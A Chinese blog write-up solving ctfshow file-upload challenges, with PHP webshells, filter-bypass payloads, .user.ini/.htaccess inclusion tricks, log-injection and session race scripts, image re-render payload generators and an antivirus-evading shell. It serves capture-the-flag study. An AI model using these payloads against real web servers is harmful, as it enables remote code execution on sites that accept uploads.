CTFSHOW 文件上传

已于 2023-11-24 16:47:56 修改
阅读量353 收藏 1
点赞数
分类专栏: WEB 文章标签: upload
于 2023-11-14 20:30:55 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/132338287
版权
文章讲述了在Web应用中,通过前端技巧如上传图片绕过内容检测,利用user.ini配置文件进行命令执行,以及通过各种编码和文件类型转换实现文件包含和日志注入的技术。涉及到的漏洞包括PHP脚本执行、二次渲染、.htaccess配置和避免杀毒检测的方法。
摘要由CSDN通过智能技术生成

web151  JS前端绕过

 直接上传 png的图片马

然后抓包修改为php

a=system("ls /var/www/html");

a=system("cat /var/www/html/flag.php");

 web152

和151一样的方法也可以实现上传

a=system("ls /var/www/html");
a=system("cat /var/www/html/flag.php");

 

web153   .user.ini

 

用之前的方式无法上传 我们使用其他后缀名看看

 

但是无法解析 访问就直接下载了 这个时候 我们可以使用 .user. ini

因为服务器是 nginx所以可以使用

auto_prepend_file = easy.png

解析 easy.png

先上传 user 发现有前端 那么我们就修改为 png

然后直接上传 easy.png

因为我们访问 upload目录的时候 会显示

说明存在index.php首页

所以我们通过 .user.ini 将 easy.png 类似 include进 index.php

进行解析 这样就会访问到我们的一句话木马

然后 我们访问/upload/index.php

a=system("ls /var/www/html");

a=system("cat /var/www/html/flag.php");

 web154  判断内容检测 ,短标签

 这里只是上传 png就报错

说明存在内容检测 多半是php格式的检测

我们可以使用其他的

<?= eval($_POST[1]);?>
 
<? eval($_POST[1]);?>
 
<% eval($_POST[1]);%>

 

那我们看看能不能还可以使用 .user.ini

 依然可以

web155

使用上面的方法还是可以

web156  对 [] 的过滤 (内容检测)

 发现又对内容进行过滤了

经过排查 发现是对 [] 进行过滤了 所以我们直接使用 {}即可绕过

<?= eval($_POST{1});?>

 然后配合 user.ini 执行命令

web157  过滤[] {} ;

这里我们可以发现 操作步骤和上面一样 但是在传犸的时候无法实现

经过一直删 发现 【】 {} ;

全被过滤了 那么木马就没办法了 但是可以通过短标签来执行system命令

<?=
system(ls)
?>

<?=
system('nl ../f*')
?>

web158

和上面一样 可以直接读取

web159  过滤() 使用内联执行

这里发现()也不好使了

我们可以使用`` 来执行命令

<?= `nl ../f*`?>

web160 user.ini + 日志包含

过滤了空格 和 ``

这里发现内联也无法实现了

我们想想看能不能直接包含日志 然后通过日志进行文件上传

发现无法实现

<?=include"/var/log/nginx/access.log"

这里我们开始删去内容 然后看看什么被过滤了 最后发现是log被过滤了

然后我们思考这里是传入字符串 所以可以通过 点 绕过

<?=include"/var/lo"."g/nginx/access.lo"."g"

成功上传

成功了 我们在ua上写入木马即可

web161 文件头检测

这里我们用之前的方法 上传不上了 这里我们继续测试 给他加个文件头 看看是不是检测文件头了

Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_prepend_file=easy.png
-----------------------------2733874569091844203618467231--

上传成功

所以这里其实就是检测文件头 然后我们看看上一题的方法能不能做


-----------------------------2733874569091844203618467231
Content-Disposition: form-data; name="file"; filename="easy.png"
Content-Type: image/png

GIF89a
<?=include"/var/lo"."g/nginx/access.lo"."g"?>
-----------------------------2733874569091844203618467231--

ok的 所以一样日志注入

web162-163 ssionse竞争

auto_append_file = "php://filter/convert.base64-decode/resource=shell.abc"

发现上面这个方法无法实现 所以我们通过 session条件竞争实现

我们直接包含一个没有和后缀的文件

-----------------------------26453916323194629079581901902
Content-Disposition: form-data; name="file"; filename=".user.ini"
Content-Type: image/png

GIF89a
auto_append_file=png
-----------------------------26453916323194629079581901902--

 这里实现了包含png 我们接下来上传png文件

需要包含临时文件 /tmp/sess_xioa

GIF89a
<?include"/tmp/sess_xioa"?>

这个是yu师傅的代码 其实我们看一下也知道了如何实现

import requests
import threading
session=requests.session()
sess='xioa'
url1="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/"
url2="http://f275f432-9203-4050-99ad-a185d3b6f466.chall.ctf.show/upload"
data1={
	'PHP_SESSION_UPLOAD_PROGRESS':'<?php system("tac ../f*");?>'
}
file={
	'file':'abcd'
}
cookies={
	'PHPSESSID': sess
}

def write():
	while True:
		r = session.post(url1,data=data1,files=file,cookies=cookies)
def read():
	while True:
		r = session.get(url2)
		if 'ctfshow' in r.text:
			print(r.text)
			
threads = [threading.Thread(target=write),
       threading.Thread(target=read)]
for t in threads:
	t.start()

web164  PNG二次渲染

这里记录一下二次渲染脚本

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
           0x66, 0x44, 0x50, 0x33);



$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
   $r = $p[$y];
   $g = $p[$y+1];
   $b = $p[$y+2];
   $color = imagecolorallocate($img, $r, $g, $b);
   imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'2.png');  //要修改的图片的路径
/* 木马内容
<?$_GET[0]($_POST[1]);?>
 */

?>

然后上传 发现存在查看图片

我们进入

然后发送请求

&0=system


post

1=cat f*

 即可获得flag

web165  JPG二次渲染

就不写了 贴个脚本

<?php
    /*

    The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations caused by PHP functions imagecopyresized() and imagecopyresampled().
    It is necessary that the size and quality of the initial image are the same as those of the processed image.

    1) Upload an arbitrary image via secured files upload script
    2) Save the processed image and launch:
    jpg_payload.php <jpg_name.jpg>

    In case of successful injection you will get a specially crafted image, which should be uploaded again.

    Since the most straightforward injection method is used, the following problems can occur:
    1) After the second processing the injected data may become partially corrupted.
    2) The jpg_payload.php script outputs "Something's wrong".
    If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another initial image.

    Sergey Bobrov @Black2Fan.

    See also:
    https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/

    */
		
    $miniPayload = "<?=eval(\$_POST[7]);?>"; //注意$转义


    if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
        die('php-gd is not installed');
    }

    if(!isset($argv[1])) {
        die('php jpg_payload.php <jpg_name.jpg>');
    }

    set_error_handler("custom_error_handler");

    for($pad = 0; $pad < 1024; $pad++) {
        $nullbytePayloadSize = $pad;
        $dis = new DataInputStream($argv[1]);
        $outStream = file_get_contents($argv[1]);
        $extraBytes = 0;
        $correctImage = TRUE;

        if($dis->readShort() != 0xFFD8) {
            die('Incorrect SOI marker');
        }

        while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
            $marker = $dis->readByte();
            $size = $dis->readShort() - 2;
            $dis->skip($size);
            if($marker === 0xDA) {
                $startPos = $dis->seek();
                $outStreamTmp = 
                    substr($outStream, 0, $startPos) . 
                    $miniPayload . 
                    str_repeat("\0",$nullbytePayloadSize) . 
                    substr($outStream, $startPos);
                checkImage('_'.$argv[1], $outStreamTmp, TRUE);
                if($extraBytes !== 0) {
                    while((!$dis->eof())) {
                        if($dis->readByte() === 0xFF) {
                            if($dis->readByte !== 0x00) {
                                break;
                            }
                        }
                    }
                    $stopPos = $dis->seek() - 2;
                    $imageStreamSize = $stopPos - $startPos;
                    $outStream = 
                        substr($outStream, 0, $startPos) . 
                        $miniPayload . 
                        substr(
                            str_repeat("\0",$nullbytePayloadSize).
                                substr($outStream, $startPos, $imageStreamSize),
                            0,
                            $nullbytePayloadSize+$imageStreamSize-$extraBytes) . 
                                substr($outStream, $stopPos);
                } elseif($correctImage) {
                    $outStream = $outStreamTmp;
                } else {
                    break;
                }
                if(checkImage('payload_'.$argv[1], $outStream)) {
                    die('Success!');
                } else {
                    break;
                }
            }
        }
    }
    unlink('payload_'.$argv[1]);
    die('Something\'s wrong');

    function checkImage($filename, $data, $unlink = FALSE) {
        global $correctImage;
        file_put_contents($filename, $data);
        $correctImage = TRUE;
        imagecreatefromjpeg($filename);
        if($unlink)
            unlink($filename);
        return $correctImage;
    }

    function custom_error_handler($errno, $errstr, $errfile, $errline) {
        global $extraBytes, $correctImage;
        $correctImage = FALSE;
        if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
            if(isset($m[1])) {
                $extraBytes = (int)$m[1];
            }
        }
    }

    class DataInputStream {
        private $binData;
        private $order;
        private $size;

        public function __construct($filename, $order = false, $fromString = false) {
            $this->binData = '';
            $this->order = $order;
            if(!$fromString) {
                if(!file_exists($filename) || !is_file($filename))
                    die('File not exists ['.$filename.']');
                $this->binData = file_get_contents($filename);
            } else {
                $this->binData = $filename;
            }
            $this->size = strlen($this->binData);
        }

        public function seek() {
            return ($this->size - strlen($this->binData));
        }

        public function skip($skip) {
            $this->binData = substr($this->binData, $skip);
        }

        public function readByte() {
            if($this->eof()) {
                die('End Of File');
            }
            $byte = substr($this->binData, 0, 1);
            $this->binData = substr($this->binData, 1);
            return ord($byte);
        }

        public function readShort() {
            if(strlen($this->binData) < 2) {
                die('End Of File');
            }
            $short = substr($this->binData, 0, 2);
            $this->binData = substr($this->binData, 2);
            if($this->order) {
                $short = (ord($short[1]) << 8) + ord($short[0]);
            } else {
                $short = (ord($short[0]) << 8) + ord($short[1]);
            }
            return $short;
        }

        public function eof() {
            return !$this->binData||(strlen($this->binData) === 0);
        }
    }
?>

web166 zip 下载->文件包含

这里我们需要传递一个zip 然后我们在后面写马

然后去下载的界面 然后抓包

发现已经解析了

然后通过这个方法getshell即可

web167  .htacess

AddType application/x-httpd-php .abc
php_value auto_append_file "php://filter/convert.base64-decode/resource=shell.abc"

 user.ini是

auto_append_file = "php://filter/convert.base64-decode/resource=shell.png"

 

然后上传shell.abc 里面的payload为base64编码的一句话

然后访问即可

 web168

说是免杀

<?php
	$a=strrev("metsys");
	$a($_REQUEST[0]);
?>

上传png 然后修改php 访问即可

 通过传递0获取

 web169-web170

日志注入

上传user.ini

auto_prepend_file=/var/log/nginx/access.log

然后再上传一个php文件 ua中写入木马即可

到这里 就结束了

感觉日志注入 咋这么多

双层小牛堡
关注
专栏目录
ctfshow文件上传
weixin_53955759的博客
04-15 795
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
CTFshow 文件上传 web162
Kradress的博客
02-15 2144
目录思路总结 思路 大致思路和上题类似,不过在上传.user.ini的时候发现.被过滤了,可以把包含的文件不带后缀来绕过 .user.ini GIF89a auto_prepend_file=png png GIF89a <?=require~%9b%9e%8b%9e%c5%d0%d0%8b%9a%87%8b%d0%8f%93%9e%96%91%d3%c3%c0%8f%97%8f%df%8c%86%8c%8b%9a%92%d7%d8%8b%9e%9c%df%d1%d1%d0%99%d5%d8%
ctfshow 文件上传
YkingH的博客
02-02 1272
以ctfshow刷题平台为例介绍CTF比赛中文件上传的常见姿势
ctfshow-web入门-文件上传(web166、web167)&(web168-web170)免杀绕过
最新发布
Welcome To Myon'Blog !
07-11 1094
查看源码,前端只让传 zip上传 zip 成功后可以进行下载随便搞一个压缩包,使用记事本编辑,在其内容里插入一句话木马:上传该压缩包,上传成功后点击下载文件,使用 burpsuite 抓包:我这里木马内容用的 request ,就在 get 里执行 ls 没什么问题,但是读取 flag 时识别有点问题,最好使用 post 请求,因此将请求方法改为 post ,将 file 的内容还原到上面。
CTFSHOW 文件上传
qq_51754713的博客
02-27 393
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFShow文件上传
paidx0
08-07 442
CTFShow文件上传 web151 前端直接抓包改就行 web152 同上 web153 利用上传.user.ini进行文件上传绕过 php.ini是php的一个全局配置文件,对整个web服务起作用; 而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini, 通常用这个文件来构造后门和隐藏后门。 **利用.user.ini,要求目标目录下必须包含php文件** .user.ini的内容为auto_append_file=1.png,意思就是使1
CTFshow 文件上传 web153
Kradress的博客
02-15 1789
目录思路总结 思路 先上传带shell的png文件,上传成功 把文件后缀改成php,上传失败,改成xxxxx上传成功,得知是黑名单过滤, 上传phtml后缀,可以成功上传,但是无法解析,可以试试上传配置文件,访问upload,发现有可执行文件index.php,可以用上传.user.ini来进行文件包含(题目是nginx) user.ini.它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。 条件: 服务器脚本语言为PHP
CTFshow 文件上传 web164
Kradress的博客
02-16 957
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 多次尝试后,发现除了正常的png图片,都无法上传,猜测用图片马上传 https://github.com/huntergregal/PNG-IDAT-Payload-Generator 虽然上传成功,但把后缀改成任意字符串却被拦截,猜测是白名单 .user.ini也无法正常上传,应该有其他的点可以利用. 直接在网站上上传图片马后,发现显示查看图片 点击查看图片后,跳转到/download.php?imag
CTFshow-文件上传
qq_61376069的博客
01-22 561
CTFshow入门——文件上传
CTFSHOW-文件上传
Monica的博客
10-03 3671
环境要求: allow_url_fopen=On(默认为On) 规定是否允许从远程服务器或者网站检索数据 allow_url_include=On(php5.2之后默认为Off) 规定是否允许include/require远程文件 WEB78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 分析:
CTFshow_文件上传
qq_45927819的博客
11-29 3143
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
[CTFSHOW]文件上传
Huamang的博客
03-28 271
web 151 看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码 web 152 和上题一样的解法 web 153 和上面一样的解法直接改后缀就没用了 测试了一下,发现是黑名单的过滤 所以就上传.htaccess文件把png文件解析成php 但是很遗憾,用不了 引用一波羽大佬的wp: 本题考点为.user.ini,详细配置可以参考官方文档 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和
ctfshow---文件上传
fainpo的博客
04-10 633
来到文件上传了。
ctfshow——文件上传
qq_55202378的博客
12-27 1378
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
CTFshow | 文件上传
m0_60651303的博客
08-04 793
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 268
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 没仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值